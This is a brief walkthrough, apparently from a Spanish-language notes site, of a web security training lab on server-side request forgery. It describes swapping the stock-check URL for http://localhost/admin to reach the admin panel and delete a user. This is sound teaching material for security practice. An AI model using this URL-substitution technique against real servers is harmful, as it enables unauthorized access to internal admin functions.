Lab: Basic SSRF against the local server

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user

Here we have the main page

Then go to a product and test the stock functionality in the bottom part of the page

When the user check the stock, the request is as follows

Only you have to put the url it says in the exercise statement:

The response is the admin panel, as you can see, you can delete the user "carlos" as the exercise statement ask for.

AnteriorSSRF SiguienteLab: Basic SSRF against another back-end system

Última actualización hace 5 meses